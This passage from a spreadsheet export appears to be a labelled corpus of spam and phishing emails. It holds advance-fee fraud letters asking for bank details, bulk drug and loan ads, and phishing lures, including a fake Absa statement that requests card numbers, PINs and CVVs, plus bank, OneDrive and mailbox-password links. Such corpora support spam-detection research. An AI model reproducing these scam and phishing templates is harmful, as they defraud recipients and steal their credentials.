beneficiary\nin respect of the provision of your Account and services rendered, 55%\nwould be for me while 5% will be for expencses incured during the cause of\nthis transaction If the money is transferred to your Account from BANK OF\nAFRICA,\n\n I and my family in this transaction will proceed immediately to your\ncountry for our own share of the money. I expect you to keep this\nbusiness strictly confidential and secret as you may wish to know that I\nam Bank official.\n\nBe rest assured that this business is 100% risk free on both side and\nevery arrangement to transfer this money to the Account you are going to\nprovide have been concluded provided we maintain the confidentiality and\nsecreceirity involved.\nContact me on my private phone number( +226-76419344 or email address at()\nI am looking forward for your prompt response.\n\nYours faithfully,\nDR. ABDULAHI.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>1339</t>
  </si>
  <si>
    <t>To: nan\nFrom: wang13 &lt;wangjun_4@mighty.co.za&gt;\nDate: Wed, 01 Jun 2005 18:36:58 -0700</t>
  </si>
  <si>
    <t>Wed, 01 Jun 2005 18:36:58 -0700</t>
  </si>
  <si>
    <t>wang13 &lt;wangjun_4@mighty.co.za&gt;</t>
  </si>
  <si>
    <t>REPRESENTATIVE NEEDED,,,,,,,,,</t>
  </si>
  <si>
    <t>\nDear Friend,\nTop of the day to you,\nMy name is Jun L. Wang, CEO.(cmiec ch) China.\nWe are a group of business men who deal on import and\nexport raw  \nmaterials into Canada, America and Europe.\nWe are looking for a representative who can help our\ncompany collect \nmoney been owed by our customer in, Europe,America,and\nCanada.\nPlease if you are interested in transacting business\nwith our \ncompanysubject to your satisfaction and in view of\nhelping us, we will \nbe very glad.\nContact us for more information, If this proposal is\nacceptable to you,\nforward to us this information:\nCONTACT ADDRESS:\nFULL NAME:\nPHONE AND FAX NUMBER:\nBest regards,\nJun L. Wang, \nCEO(cmiec ch) \nChina.\n\n\n___________________________________________________________________________\nMail sent from WebMail service at Ourfamilyaffair.com- [URL]http://ourfamilyaffair.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://ourfamilyaffair.com</t>
  </si>
  <si>
    <t>49</t>
  </si>
  <si>
    <t>To: nan\nFrom: Ruka &lt;rulagg@excite.com&gt;\nDate: Wed, 01 Jan 2003 08:50:53 -0500</t>
  </si>
  <si>
    <t>Wed, 01 Jan 2003 08:50:53 -0500</t>
  </si>
  <si>
    <t>Ruka &lt;rulagg@excite.com&gt;</t>
  </si>
  <si>
    <t>\n\n\nDear Sir,\n\nFirst I must solicit your confidence in this transaction, this is by virtue of its nature as being very CONFIDENTIAL. \nI am a Senior Manager with a commercial bank . I came to know of you in my private search for a reliable and reputable person to handle this confidential transaction, which involves the transfer of a huge sum of money to a foreign country.\n\nTHE PREPOSITION\nThe late  JERRY ADAMS a Foreigner and an oil merchant / contractor with the Federal Government of Nigeria until his death four years ago in a plane crash, banked with us  and had a closing balance of USD10,000,000.00 (Ten Million United States Dollars).\n\nThe bank now unquestionably expect it to be claimed by JERRY ADAMS next of kin. Efforts have been made by my bank to get in touch with any of the ADAMS Family but to no avail. It is because of the perceived possibility of not being able to locate JERRY ADAMS next of kin (NOK) that the management under the influence of our Executive Director has agreed that since the incident occurred in 1997 and has left the fund dormant and devalued, we should transfer the fund overseas and utilize it either on stock exchange market or personal business interest.\n\nYour role is very important as the fund when concluded on transfer would be justifiably presented as having been remitted to JERRY ADAMS next of kin (NOK)  . Your interest will be protected as unnecessary documentation will be avoided. Note that all modalities necessary for execution of the business have been perfected. \n\nThe money will be shared equally i.e 50% for you 50% for us, expenses too will be shared equally .\n\nIt is a risk-free deal. \n\nMr Temi Efosa\nMail to : tefosa2@37.com \n\n\n\n_______________________________________________\nJoin Excite! - [URL]http://www.excite.com[/URL]\nThe most personalized portal on the Web!\n\n</t>
  </si>
  <si>
    <t>http://www.excite.com</t>
  </si>
  <si>
    <t>1735</t>
  </si>
  <si>
    <t>To: ben2002a@emailwave.com\nFrom: BEN S. ADAM &lt;ben2002a@post.cz&gt;\nDate: Wed, 01 Feb 2006 20:25:02 -0500</t>
  </si>
  <si>
    <t>Wed, 01 Feb 2006 20:25:02 -0500</t>
  </si>
  <si>
    <t>BEN S. ADAM &lt;ben2002a@post.cz&gt;</t>
  </si>
  <si>
    <t>ben2002a@emailwave.com</t>
  </si>
  <si>
    <t>I NEED YOUR URGENT ASSISTANCE</t>
  </si>
  <si>
    <t>Dear Sir,  In order to transfer out (USD 45 MILLION) Forty Five million United  States Dollars) from BANK OF AFRICA (BOA): I have the courage to ask  for your assistance to handle this important and confidential business  believing that you will never let me down either now or in future. I am  MR. BENJAMINE S.ADAM, the OPERATIONAL MANAGER of BANK OF AFRICA, (BOA)  BENIN.  There is an account opened in this bank in 1989 and since 1996 nobody  has operated on this account again. After going through some old files  in the records, I discovered that if I do not remit this money out  urgently it will be forfeited for nothing.  The owner of this account is Mr.PAULTON ALLEN, a foreigner, and a miner at D&amp;D INVESMENT CO, a  geologist by profession and he died since 1996.  No other person knows about this account or any thing concerning it,  the account has no other beneficiary and my investigation proved to me  as well that this company does not know anything about this account and  the amount involved is (USD 45M).  I want to transfer the [USD 45M] Forty Five million United States  Dollars into a safe foreigners account abroad, but I don't know any  foreigner.  I am only contacting you as a foreigner because this money  can not be approved to a local bank here, but can only be approved to any  foreign account because the money is in us dollars and the former owner  of the account is Mr.PAULTON ALLEN a foreigner too.  I know that this message will come to you as a surprise as we dont  know our selves before, but be sure that it is real and a genuine  business.  I only got your contact address from my secretary who  operates computer with believe in God that you will never let me down in this  business.You are the only person that I have contacted in this  business, so please reply urgently so that I will inform you the next step to take.  Send also your private telephone and fax numbers including the full  details of the account to be used for the deposit. I want us to meet  face to face or sign a binding agreement to bind us together so that you can  receive this money into a foreign account or any account of your choice  where the fund will be safe.  I will fly to your country for withdrawal, sharing and other  investments. I am contacting you because of the need to involve a  foreigner with foreign account and to act as a foreign beneficiary.  I need your full co-operation to make this work fine because the  management is ready to approve this payment to any foreigner who has  correct information of this account which I will give to you later immediately,  if you are able and with capability to handle such amount in strict  confidence and trust according to my instructions and advice for our  mutual benefit because this opportunity will never come again in my  life.  I need truthful person in this business because I don't want to make  mistake, I need your strong assurance and trust. With my position now  in the office I can transfer this money to any foreigner's reliable  account, which you can provide with assurance that this money will be  intact pending my physical arrival in your country for sharing.  I will destroy all documents of transaction immediately we receive this  money leaving no trace to any place. You can also come to discuss with  me face to face after which I will make this remittance in your  presence and two of us will fly to your country so at least two days  ahead of the money going into the account.  I will apply for annual leave to get visa immediately I hear from you  that you are ready to act and receive this fund in your account.  I will use my position and influence to effect legal approvals and  onward transfer of this money to your account with appropriate  clearance forms of the ministries and foreign exchange departments.  At the conclusion of this business, you will be given 35% of the total  amount, 60% will be for me, while 5% will be for expenses both parties  might have incurred during the process of transferring.  Please bear in mind that this fund is not  a looted or stolen money but rather a hard earned money generated. Pls if you are willing to work with me, kindly forward to me your  personal detail to enable me reach you, this includes the following: 1. Your full names 2. Your residential address 3. Your bank account informations 4. Your occupation   5. Your telephone and fax numbers 6. Including more Preamble about yourself (marital status)        Below is my alternative Contacts:   E-MAIL: ben_salifou@yahoo.com      PHONE# 229-98-177798 COTONOU BENIN REPUBLIC.   I look forward to your earliest reply.  Yours Truly,  MR. BENJAMINE SALIFOU ADAM   Msg sent via eMailWave - [URL]http://emailwave.com[/URL] - Get your own FREE account and start receiving your eMail.</t>
  </si>
  <si>
    <t>http://emailwave.com</t>
  </si>
  <si>
    <t>1734</t>
  </si>
  <si>
    <t>To: elizabeth_tambo10@hotmail.com\nFrom: elizabeth tambo &lt;elizabeth_tambo10@hotmail.com&gt;\nDate: Wed, 01 Feb 2006 12:16:11 +0200</t>
  </si>
  <si>
    <t>Wed, 01 Feb 2006 12:16:11 +0200</t>
  </si>
  <si>
    <t>elizabeth tambo &lt;elizabeth_tambo10@hotmail.com&gt;</t>
  </si>
  <si>
    <t>elizabeth_tambo10@hotmail.com</t>
  </si>
  <si>
    <t>INVITATION FOR PARTNERSHIP</t>
  </si>
  <si>
    <t>FROM:MRS ELIZABETH SMITH TAMBO\nTELE:+27-83-9924367\nE-MAIL:tambofamily1@yahoo.com\nE-MAIL:elizabeth_smithtambo200@hotmail.com\n\n                                           INVITATION FOR PARTNERSHIP\n\n\nMy Name is MRS ELIZABETH SMITH TAMBO ,the WIFE of MR.DANIEL SMITH TAMBO of \nZimbabwe.\n\nThis might be a surprise to you about where I got your contact address.\n\nI got your(CONTACT FROM THE SOUTH AFRICA EXCHENAGE NETWORK ONLINE).\n\nDuring the current war against the farmers in Zimbabwe from the supporters \nof our President Robert Mugabe to claim all the white-owned farms to his \nparty member and his followers, he ordered all farmers to surrender all \nfarms to his party members and his followers.\n\nMY  HUSBAND  is One of the best farmers in our country and because he did \nnot supporter Mugabes ideas,Mugabes supporters invaded my hubands farm and \nburnt everything in the farm,killing my husband and made away with a lot of \nitems in my husbands farm.\n\nBefore his death,my husband had deposited with the Security Company in \nJohannesburg,South Africa the sum of USD$20 MILLION(TWENTY MILLION DOLLARS) \nAfter the death of my husband, We decided to move to the Republic of South \nAfrica where he had deposited the money in the Security Company as family \nvaluables.\n\nSo I decided to contact overseas firm and companies that will assist me to \nmove this money out of South Africa because as asylum seekers we are not \nallowed to operate any Bank Account within South Africa.\n\nWe have agreed to offer you 25% of the total sum for your assistance,5% will \nbe mapped out for any expenses that may be incurred in the course of this \ntransaction while 70 Will be for me and my family to invest in your country.\n\nAll I want you to do is to furnish me with your entire personal phone and \nfax numbers for easy communication.\n\nYou can contact my son on the above Telephone +27-83-9924367 or E-mail \nnumber he will informed you on what to do next.\n\nNote that this transaction is 100% Risk free and absolutely confidential.\n\nThanks and God bless.\n\nBEST REGARDS\nMRS ELIZABETH SMITH TAMBO.\nFor the Family.\n\n_________________________________________________________________\nNeed pet-care advice? Find it with MSN Search! [URL]http://search.msn.co.za[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://search.msn.co.za</t>
  </si>
  <si>
    <t>4654</t>
  </si>
  <si>
    <t>To: &lt;Undisclosed Recipients@connect.workstation.org.uk&gt;\nFrom: atkinsonscott@fuse.net\nDate: Wed, 01 Aug 2001 11:30:17 -1600</t>
  </si>
  <si>
    <t>Wed, 01 Aug 2001 11:30:17 -1600</t>
  </si>
  <si>
    <t>atkinsonscott@fuse.net</t>
  </si>
  <si>
    <t>&lt;Undisclosed Recipients@connect.workstation.org.uk&gt;</t>
  </si>
  <si>
    <t>Viagra Online Now!!                         22560</t>
  </si>
  <si>
    <t>VIAGRA   the breakthrough medication for impotence delivered to your mailbox... ..without leaving your computer. Simply Click Here:[URL]http://host.1bulk-email-software.com[/URL] In less than 5 minutes you can complete the on-line consultation and in many cases have the medication in 24  hours. Simply Click Here:[URL]http://host.1bulk-email-software.com[/URL] &gt;From our website to your mailbox. On-line consultation for treatment of compromised sexual function. Convenient...affordable....confidential. We ship VIAGRA worldwide at US prices. To Order Visit:[URL]http://host.1bulk-email-software.com[/URL] This is not a SPAM. You are receiving this because you are on a list of email addresses that I have bought. And you have opted to receive information about business opportunities. If you did not opt in to receive information on business opportunities then please accept  our apology. To be REMOVED from this list simply reply  with REMOVE as the subject. And you will NEVER receive  another email from me.mailto:remove432@businessinfo-center.com</t>
  </si>
  <si>
    <t>http://host.1bulk-email-software.com http://host.1bulk-email-software.com http://host.1bulk-email-software.com</t>
  </si>
  <si>
    <t>4647</t>
  </si>
  <si>
    <t>To: &lt;Undisclosed Recipients@netnoteinc.com&gt;\nFrom: dlpost34@yahoo.com\nDate: Wed, 01 Aug 2001 01:58:18 -0700</t>
  </si>
  <si>
    <t>Wed, 01 Aug 2001 01:58:18 -0700</t>
  </si>
  <si>
    <t>dlpost34@yahoo.com</t>
  </si>
  <si>
    <t>&lt;Undisclosed Recipients@netnoteinc.com&gt;</t>
  </si>
  <si>
    <t>Home Loans Just Got Better!</t>
  </si>
  <si>
    <t>We are Loan Specialists Fre= e Service to Homeowners!  Home Loans Available For Any Situation.  Whether your credit rating is A++ or you are "credit challenged", we have many loan programs through hundreds of lenders.  Sec= ond Mortgages - We can help you get up to 1= 25% of your homes value (ratios vary by state).  Ref= inancing - Reduce your monthly payment= s and get cash back. Debt Consolidation - Combine all your bills into=  one, and save money every month.  CLICK  HERE For All Details And A Free Loan Quotation  Today! We = strongly oppose the  use of SPAM email and do not want anyone who does not wish to receive  our mailings to receive them. As a result, we have retained the  services of an independent 3rd party to administer our list manag= ement  and remove list ([URL]http://www.removeyou.com[/URL] This is=  not  SPAM. If you do not wish to receive further mailings, please clic= k  below and enter your email at the bottom of the page. You may the= n  rest-assured that you will never receive another email from us ag= ain.  [URL]http://www.removeyou.com[/URL] The 21= st  Century Solution. I.D. # 023154</t>
  </si>
  <si>
    <t>http://www.removeyou.com http://www.removeyou.com</t>
  </si>
  <si>
    <t>5743</t>
  </si>
  <si>
    <t>To: &lt;yyyy4@netnoteinc.com&gt;\nFrom: fg480525@caramail.com\nDate: Wed,  7 Aug 2002 04:35:23 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed,  7 Aug 2002 04:35:23 -0400 (EDT)</t>
  </si>
  <si>
    <t>fg480525@caramail.com</t>
  </si>
  <si>
    <t>&lt;yyyy4@netnoteinc.com&gt;</t>
  </si>
  <si>
    <t>~Beautiful,Custom Websites $359 Complete! (or yours re-designed) (6320cUmF1-704zRjD7955@20)</t>
  </si>
  <si>
    <t>\n\n**Beautiful, 100% Custom Websites, $359 Complete!**  \n  \n---  \n  \n|\n\n|  |\n\n![]([URL]http://7x24.sunshinehui.com[/URL]\n\n|\n\n**Get a beautiful, 100% Custom Web Site ( _or yours redesigned_ )  _for only\n$359_!*  \n  \nWe have references coast to coast  \nand will give you _plenty of sites to view!_**  \n  \n---|---  \n  \n**Includes up to 7 pages (you can add more), java rollover buttons, feedback\nforms, more. It will be constructed to your taste and specifications. We do\nnot use templates,   _our sites are completely custom.  _   * _Must host with\nus @ $19.95/mo (100 Megs, 20 Email accounts, Control Panel, Front Page,\nGraphical Statistics, more).  \n_**  \n  **_For sites to view, complete below or call our message center at\n    321-726-2209 (24 hours). Your call will be returned promptly._  \n  \n** ** _NOTE:    If you are using a web based email program (such as Yahoo,\nHotmail, etc.) the form below will not work._  Instead of using the form,\n_CLICK HERE_ .**\n\n    Name: Phone w/AC*:State:   \nType Project: ___New Site: Redesign Flash Intro/banner_   Current site?:  \nComments:  \n  \n  \n  \nIf you do not wish to receive our messages, **_CLICK HERE   (Please enter ALL\nemail addresses (in the body of the message) you wish to have eliminated from\nfuture mailings.\n\n_**  \n  \n[8734IcUm5-941FzRj1099DvNh4-450ZrLD0601Vnia4-052sMEW9113qIaU3-562mEwQ9923iBvN2-17@75]\n\n</t>
  </si>
  <si>
    <t>http://7x24.sunshinehui.com</t>
  </si>
  <si>
    <t>5741</t>
  </si>
  <si>
    <t>To: jtr@usa.net\nFrom: doitnow@freemail.nl\nDate: Wed,  7 Aug 2002 03:30:11 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed,  7 Aug 2002 03:30:11 -0400 (EDT)</t>
  </si>
  <si>
    <t>doitnow@freemail.nl</t>
  </si>
  <si>
    <t>jtr@usa.net</t>
  </si>
  <si>
    <t>fortune 500 company hiring, work from home</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lotsonet.com[/URL]\n\nand fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.\nNO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO\nONLY.\n\n[URL]http://www.lotsonet.com[/URL]\n\nYou want to be independent?  THEN MAKE IT HAPPEN!\nHAPPEN!\n\nSIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!\nGUARANTEED!\n\n[URL]http://www.lotsonet.com[/URL]\n\n\nTo be removed from our link simple go to:\n\n[URL]http://www.lotsonet.com[/URL]\n\n\n4227KypC4-306RFEI2068IzYK2-443dlUl6l33</t>
  </si>
  <si>
    <t>4297</t>
  </si>
  <si>
    <t>To: EIN Media &lt;allcontacts@briefs.ein.cz&gt;\nFrom: EIN Media &lt;pe@europeaninternet.com&gt;\nDate: Wed,  4 Sep 2002 16:51:20 +0200 (CEST)</t>
  </si>
  <si>
    <t>Wed,  4 Sep 2002 16:51:20 +0200 (CEST)</t>
  </si>
  <si>
    <t>EIN Media &lt;pe@europeaninternet.com&gt;</t>
  </si>
  <si>
    <t>EIN News - FREE Trial</t>
  </si>
  <si>
    <t>Dear Sir or Madam,\n\nMy name is Petr Stanek and I am managing the free trial \nsubscription program at the European Internet Network (EIN).  \n\nEIN publishes hourly updated breaking news headlines and other \nimportant information from 200 countries and regions. \n\nDuring September, you and your associates can have a \nFREE TRIAL SUBSCRIPTION to the EIN DELUXE Edition.\n\nYou will have access to a collection of 25,000 daily \nupdated articles, a news archive and many other benefits too. \n\nOnce again, this trial is FREE. \n\nTo subscribe, just reply to this e-mail or sign up at: \n[URL]http://www.europeaninternet.com[/URL] \n\nA partial list of current EIN subscribers can be found at:  \n[URL]http://www.europeaninternet.com[/URL]\n\nIf you have any questions, comments, or need assistance  \nsigning up, please contact us personally by either writing to \nhelpdesk@europeaninternet.com or simply replying to this email. \n\nPlease feel free to forward this offer to any of your colleagues. \n\nBest regards,\n\nPetr Stanek\nSubscription Department\nEIN News\n[URL]http://www.einnews.com[/URL]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nTo be removed please reply to: remove@europeaninternet.com</t>
  </si>
  <si>
    <t>http://www.europeaninternet.com http://www.europeaninternet.com http://www.einnews.com</t>
  </si>
  <si>
    <t>567</t>
  </si>
  <si>
    <t>To: "jose" &lt;jose@monkey.org&gt;\nFrom: "American Express" &lt;gea.hilb@cox.net&gt;\nDate: Tue, 9 May 2017 15:20:59 -0500</t>
  </si>
  <si>
    <t>Tue, 9 May 2017 15:20:59 -0500</t>
  </si>
  <si>
    <t>"American Express" &lt;gea.hilb@cox.net&gt;</t>
  </si>
  <si>
    <t>"jose" &lt;jose@monkey.org&gt;</t>
  </si>
  <si>
    <t>American Express:  Urgent message, Please read!  E9fe5EdIF</t>
  </si>
  <si>
    <t>Dear Member,\n\n\n\nYou have a new secure message regarding your card servies.\n\n\n\nVisit our secure server below to read\n\n\n\n[URL]https://nofyerushalaim.com[/URL]\n\n\n\nNote: You are required to attend to this message result to termination of tyour card services.\n\n\n\nThanks,\n\nAmerican Express\n\n\n</t>
  </si>
  <si>
    <t>https://nofyerushalaim.com</t>
  </si>
  <si>
    <t>776</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Absa Credit Card Account"&lt;officialemail@absa.co.za&gt;\nDate: Tue, 8 May 2018 16:18:25 -0700</t>
  </si>
  <si>
    <t>Tue, 8 May 2018 16:18:25 -0700</t>
  </si>
  <si>
    <t>"Absa Credit Card Account"&lt;officialemail@absa.co.za&gt;</t>
  </si>
  <si>
    <t>Absa Credit Card Account Statement Fee Deducted</t>
  </si>
  <si>
    <t>eStatement 									 													Dear Customer 												 													Your statement 												 												Attached is your electronic statement. 												   													Your security 												 													The additional verifications were added to help prevent 													online fraud. Information only known to you is  													displayed on your eStatement; so that you know the  													statement was sent by Absa. 												 													The Striata Reader that you use to open your secure  													statements further ensures the highest levels of  													security. You can download the reader by seeing the  													easy step by step instructions below. 												   													Contact us 												 													For more information, contact officialemail@absa.co.za or the call centre on 0860 111 123. 												 																Absa Mobile Banking App 																 																Please scan this 																quick response code 																to download 															   eStatement 									  	Opening your statement                                       									   									  	Connect to the Internet                                       									   									  	Download the Reader: Go to striata.com/download and click on 'Download Striata Reader'.                                       									   									  	Select 'Open/Run'. If no 'Open/Run' option is given, select 'Save' and then 'Open'. 									   									  	The Reader is now installed. Select 'Ok' to close the 'install confirmation' dialogue box. 									   									  	Double-click on the encrypted attachment. You will be prompted to type Your Credit Card number , Atm pin, Cvv and Mobile number. 									   										On the move 									 										Do you view your statements on your mobile device? Simply install the latest Striata Reader App from the App Store. 									 										Yours sincerelyDigital Channels 									 										Absa Bank Ltd Reg No 1986/004794/06 Authorised Financial Services Provider Registered Credit Provider NCRCP7 									 Important  Notice: Absa  is an Authorised Financial Services Provider and Registered Credit Provider,  registration number: NCRCP7. This e-mail and any files transmitted with it may  contain information that is confidential, privileged or otherwise protected from  disclosure. If you are not an intended recipient of this e-mail, do not  duplicate or redistribute it by any means. Please delete it and any attachments  and notify the sender that you have received it in error. Unless specifically  indicated, this e-mail is not an offer to buy or sell or a solicitation to buy  or sell any securities, investment products or other financial product or  service, an official confirmation of any transaction, or an official statement  of Absa. Any views or opinions presented are solely those of the author and do  not necessarily represent those of Absa. This e-mail is subject to terms  available at the following link: [URL]http://www.absa.co.za[/URL]  The Disclaimer forms part of the content of this email. If you are unable  to access the Disclaimer, send a blank e-mail to disclaimer@absa.co.za and we will send you  a copy of the Disclaimer. By messaging with Absa you consent to the  foregoing. By emailing Absa you consent  to the terms herein. This email may relate to or be sent from other members  of the Absa Group.</t>
  </si>
  <si>
    <t>http://www.absa.co.za</t>
  </si>
  <si>
    <t>4778</t>
  </si>
  <si>
    <t>To: bkedfcvqrt@topdrawerbiz.com\nFrom: savemoney@first.topdrawerbiz.com\nDate: Tue, 7 May 2002 18:28:00 -0400</t>
  </si>
  <si>
    <t>Tue, 7 May 2002 18:28:00 -0400</t>
  </si>
  <si>
    <t>savemoney@first.topdrawerbiz.com</t>
  </si>
  <si>
    <t>bkedfcvqrt@topdrawerbiz.com</t>
  </si>
  <si>
    <t>ADV: Extended Auto Warranty -- even older cars... xwczh</t>
  </si>
  <si>
    <t>Protect yourself with an extended warranty for your car, minivan, truck or SUV. Rates can be as much as 60% cheaper than at the dealer!\n        \nExtend your existing Warranty.\n        \nGet a new Warranty even if your original Warranty expired.\n        \nGet a FREE NO OBLIGATION Extended Warranty Quote NOW. Find out how much it would cost to Protect YOUR investment. \n        \nThis is a FREE Service.\n                                   \nSimply fill out our FREE NO OBLIGATION form and \nfind out.\n                                   \nIt's That Easy!\n                                   \nVisit our website:  \n [URL]http://211.78.96.242[/URL]\n                              \n                                   \n================================================\n                                   \nTo be removed, click below and fill out the remove form:\n[URL]http://211.78.96.242[/URL]\nPlease allow 72 hours for removal.</t>
  </si>
  <si>
    <t>http://211.78.96.242 http://211.78.96.242</t>
  </si>
  <si>
    <t>4777</t>
  </si>
  <si>
    <t>To: crackmice@crackmice.com\nFrom: "sexygirl" &lt;gbest@mail.com&gt;\nDate: Tue, 7 May 2002 18:27:02 +0800</t>
  </si>
  <si>
    <t>Tue, 7 May 2002 18:27:02 +0800</t>
  </si>
  <si>
    <t>"sexygirl" &lt;gbest@mail.com&gt;</t>
  </si>
  <si>
    <t>crackmice@crackmice.com</t>
  </si>
  <si>
    <t>make love tonight =?GB2312?B?w8DFrs28xqw=?=</t>
  </si>
  <si>
    <t>\n\n![]([URL]http://www.virtuagirl.com[/URL]\n\nclick here to see more\n\n</t>
  </si>
  <si>
    <t>http://www.virtuagirl.com</t>
  </si>
  <si>
    <t>4772</t>
  </si>
  <si>
    <t>To: fork@voycomp.com\nFrom: "Kathryn Sachdeva" &lt;hgh-2002free@yahoo.com&gt;\nDate: Tue, 7 May 2002 08:23:42 +0800</t>
  </si>
  <si>
    <t>Tue, 7 May 2002 08:23:42 +0800</t>
  </si>
  <si>
    <t>"Kathryn Sachdeva" &lt;hgh-2002free@yahoo.com&gt;</t>
  </si>
  <si>
    <t>fork@voycomp.com</t>
  </si>
  <si>
    <t>fork,Your HGH Request!</t>
  </si>
  <si>
    <t>\n\n  \n\n|  |\n\nHello, fork@voycomp.com,  \n  \nAs seen on NBC, CBS, CNN, and even Oprah! The health discovery that actually\nreverses aging while burning fat, without dieting or exercise! This proven\ndiscovery has even been reported on by the New England Journal of Medicine.\nForget aging and dieting forever! And it's Guaranteed!  \n  \n  \nClick here\n\n* * *\n\n**Woul d you like to lose weight while you sleep!  \nNo dieting!  \nNo hunger pains!  \nNo Cravings!  \nNo strenuous exercise!  \nChange your life forever! **\n\n| 1.Body Fat Loss  | 82% improvement.  \n---|---  \n2.Wrinkle Reduction  | 61% improvement.  \n3.Energy Level  | 84% improvement.  \n4.Muscle Strength  | 88% improvement.  \n5.Sexual Potency  | 75% improvement.  \n6.Emotional Stability  | 67% improvement.  \n7.Memory  | 62% improvement.  \n  \n**100% GUARA NTEED!**  \n  \n---  \n  \n* * *  \n  \n  \n---  \n  \n---  \n  \n**You are rec eiving this email as a subscriber  \nto the Opt-In America Mailing List.  \nTo remove yourself from all related maillists,  \njust  Click Here **  \n  \n---  \n[URL]http://xent.com[/URL]\n\n</t>
  </si>
  <si>
    <t>4776</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "laurent mpeti kabila" &lt;mpeti_k@mail.com&gt;\nDate: Tue, 7 May 2002 08:04:46 +0200</t>
  </si>
  <si>
    <t>Tue, 7 May 2002 08:04:46 +0200</t>
  </si>
  <si>
    <t>"laurent mpeti kabila" &lt;mpeti_k@mail.com&gt;</t>
  </si>
  <si>
    <t>(no subject)</t>
  </si>
  <si>
    <t>REQUEST FOR URGENT BUSINESS ASSISTANCE\n--------------------------------------\nI stumbled into your contact by stroke of luck after a\nlong search for an honest and trust worthy person who \ncould handle issue with high confidentiality.\nI was so dilghted when i got your contact and i decided\nto contact you  and solicite for your kind assistance.\ni hope you will let this issue to remain confidential even\nif you are not interested because of my status.\n \nI am Laurent Mpeti Kabila (Jnr) the second son of\nLate President LAURENT DESIRE KABILA the immediate\nPast president of the DEMOCRATIC REPUBLIC OF CONGO in\nAfrica who was murdered by his opposition through his personal\nbodyguards in his bedroom on Tuesday 16th January, 2001.\nI have the privilege of being mandated by my father,s \ncolleagues to seek your immediate and urgent co-operation \nto receive into your bank account the sum of US $25m.\n(twenty-five million Dollars) and some thousands carats\nof Diamond. This money and treasures was lodged in a vault with a\nsecurity firm in Europe and South-Africa.\n\nSOURCES OF DIAMONDS AND FUND\nIn August 2000, my father as a defence minister and\npresident has a meeting with his cabinet and armychief about the\ndefence budget for 2000 to 2001 which was US $700m. \nso he directed one of his best friend. Frederic Kibasa Maliba\nwho was a minister of mines and a political party leader known\nas the Union Sacree de,opposition radicale et ses allies (USORAL)\nto buy arms with US $200m on 5th January 2001; for him to finalize\nthe arms deal,my father was murdered. f.K. Maliba (FKM) and I have\ndecided to keep the money with a foreigner after which he will use\nit to contest for the political election. Inspite of all this we\nhave resolved to present you or your company for the firm to pay \nit into your nominated account the above sum and diamonds. \nThis transaction should be finalized within seven (7) working \ndays and for your co-operation and partnership, we have unanimously \nagreed that you will be entitled to 5.5% of the money when successfully \nreceive it in your account. The nature of your business is not relevant to \nthe successful execution of this transaction what we require is your \ntotal co-operation and commitment to ensure 100%risk-free transaction at \nboth ends and to protect the persons involved in this transaction  strict\nconfidence and utmost secrecy is required even after the uccessful conclusion \nof this transaction. If this proposal is acceptable to you, kindly provide me\nwith your personal telephone and fax through my E-mail box for immediate\ncommencement of the transaction. I count on your honour to keep my\nsecret, SECRET.\n\nLooking forward for your urgent reply\n\nThanks.\nBest Regards\n  \nMPETI L. KABILA (Jnr)\n\n\n\n\n\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>1184</t>
  </si>
  <si>
    <t>To: john_grant@kindredhealthcare.com\nFrom: Venkatakrishna B &lt;venkatkrishna.b@samrakshana.com&gt;\nDate: Tue, 7 Apr 2020 05:09:55 +0530 (IST)</t>
  </si>
  <si>
    <t>Tue, 7 Apr 2020 05:09:55 +0530 (IST)</t>
  </si>
  <si>
    <t>Venkatakrishna B &lt;venkatkrishna.b@samrakshana.com&gt;</t>
  </si>
  <si>
    <t>john_grant@kindredhealthcare.com</t>
  </si>
  <si>
    <t>Important Document !!!!!!</t>
  </si>
  <si>
    <t>BQ_BEGIN BQ_BEGIN BQ_BEGIN The sender has shared the following files with you:  [ [URL]https://storage.googleapis.com[/URL] | DOCUMENTS View in OneDrive ]  Free online storage for your files. [ [URL]https://onedrive.live.com[/URL] | Check it out. ]  [ [URL]https://onedrive.live.com[/URL] | Get the OneDrive mobile app. ]  Microsoft respects your privacy. To learn more, please read our [ [URL]https://privacy.microsoft.com[/URL] | Privacy Statement ] .  Microsoft Corporation, One Microsoft Way, Redmond, WA, 98052  BQ_END BQ_END BQ_END The sender has shared the following files with you:DOCUMENTS View in OneDriveFree online storage for your files. Check it out.Get the OneDrive mobile app.Microsoft respects your privacy. To learn more, please read our Privacy Statement.Microsoft Corporation, One Microsoft Way, Redmond, WA, 98052</t>
  </si>
  <si>
    <t>https://storage.googleapis.com https://onedrive.live.com https://onedrive.live.com https://privacy.microsoft.com</t>
  </si>
  <si>
    <t>TWN</t>
  </si>
  <si>
    <t>714</t>
  </si>
  <si>
    <t>To: "info@unm.org" &lt;info@unm.org&gt;\nFrom: McMillin David &lt;dmcmillin@mmchs.org&gt;\nDate: Tue, 6 Feb 2018 23:27:29 +0000</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2018 23:27:29 +0000</t>
  </si>
  <si>
    <t>McMillin David &lt;dmcmillin@mmchs.org&gt;</t>
  </si>
  <si>
    <t>"info@unm.org" &lt;info@unm.org&gt;</t>
  </si>
  <si>
    <t>Rv-Staff-Email Access</t>
  </si>
  <si>
    <t>Dear Staff\n\n\nYour e-mailbox password will soon expire. to validate your e-mail or you will be temporary block Please confirm the link below to Update your e-mail\n\n\nClick the link [URL]https://au-mai.webnode.com[/URL]\n\n\nThank you,\n\nIT Support\n\nCONFIDENTIALITY NOTE:  The information contained in this transmission may contain privileged and confidential information, including patient information protected by federal and state privacy laws. It is intended only for the use of the person(s) named above. If you are not the intended recipient, you are hereby notified that any review, dissemination, distribution, or duplication of this communication is strictly prohibited. Please contact the sender by reply email and destroy all copies of the original message. \n\n\n</t>
  </si>
  <si>
    <t>https://au-mai.webnode.com</t>
